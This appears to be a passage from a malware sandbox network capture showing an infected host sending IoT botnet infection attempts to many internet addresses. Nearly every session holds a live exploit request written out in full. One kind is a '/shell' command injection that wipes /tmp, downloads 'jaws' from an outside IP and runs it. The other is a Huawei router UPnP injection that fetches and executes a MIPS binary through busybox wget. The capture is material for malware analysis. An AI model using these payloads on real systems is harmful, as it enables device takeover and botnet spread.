                                                          433192.168.2.234315477.46.139.24480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.038352013 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:02.309694052 CET37INHTTP/1.1 404 Site or Page Not Found
                                                          Jan 2, 2024 06:25:02.313224077 CET294INData Raw: 53 65 72 76 65 72 3a 20 44 56 52 44 56 53 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 54 75 65 20 4a 61 6e 20 20 32 20 30 37 3a 32 31 3a 33 39 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
                                                          Data Ascii: Server: DVRDVS-WebsDate: Tue Jan 2 07:21:39 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not Fou


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          434192.168.2.235187877.40.58.2380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.046175957 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:02.324465036 CET115INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: 400 Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          435192.168.2.2338410211.253.8.10780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.050528049 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:02.336431980 CET466INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:02 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          436192.168.2.235113852.218.234.14780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.194485903 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:02.378586054 CET636INHTTP/1.1 505 HTTP Version not supported
                                                          Date: Tue, 02 Jan 24 05:25:02 GMT
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          x-amz-id-2: pckCgutiGfkz1pRxVxJlDn0g5jL0Olmu+Yd1cQP/FIhGmRYFXlR8fnxTst+bfQjJSvnOZ+jWj3PS/cGpShRUvN2Z7CX+zscj
                                                          x-amz-request-id: 1A93DBCCBCE14A43
                                                          Content-Type: application/xml
                                                          Server: AmazonS3
                                                          Data Raw: 31 33 30 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 48 74 74 70 56 65 72 73 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 48 54 54 50 20 76 65 72 73 69 6f 6e 20 73 70 65 63 69 66 69 65 64 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 31 41 39 33 44 42 43 43 42 43 45 31 34 41 34 33 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 70 63 6b 43 67 75 74 69 47 66 6b 7a 31 70 52 78 56 78 4a 6c 44 6e 30 67 35 6a 4c 30 4f 6c 6d 75 2b 59 64 31 63 51 50 2f 46 49 68 47 6d 52 59 46 58 6c 52 38 66 6e 78 54 73 74 2b 62 66 51 6a 4a 53 76 6e 4f 5a 2b 6a 57 6a 33 50 53 2f 63 47 70 53 68 52 55 76 4e 32 5a 37 43 58 2b 7a 73 63 6a 3c 2f 48 6f 73 74 49 64 3e 3c 2f 45 72 72 6f 72 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 130<?xml version="1.0" encoding="UTF-8"?><Error><Code>HttpVersionNotSupported</Code><Message>The HTTP version specified is not supported.</Message><RequestId>1A93DBCCBCE14A43</RequestId><HostId>pckCgutiGfkz1pRxVxJlDn0g5jL0Olmu+Yd1cQP/FIhGmRYFXlR8fnxTst+bfQjJSvnOZ+jWj3PS/cGpShRUvN2Z7CX+zscj</HostId></Error>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          437192.168.2.2339358146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.224817991 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:01Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          438192.168.2.235387651.255.91.12080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.258701086 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:02.505062103 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.21.6
                                                          Date: Tue, 02 Jan 2024 05:25:02 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          439192.168.2.234543852.196.15.13180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.277841091 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:02.544378996 CET201INHTTP/1.1 503 Service Temporarily Unavailable
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:02 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 0
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          440192.168.2.2360596154.221.82.22180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.335947990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          441192.168.2.2339388146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.567996979 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:02Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          442192.168.2.2339398146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:02.895436049 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:02Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          443192.168.2.2339412146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.224488020 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 35 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:25:02Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          444192.168.2.2359154156.254.94.2637215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.334223032 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:04.903599977 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:06.759372950 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:10.534810066 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:17.957768917 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
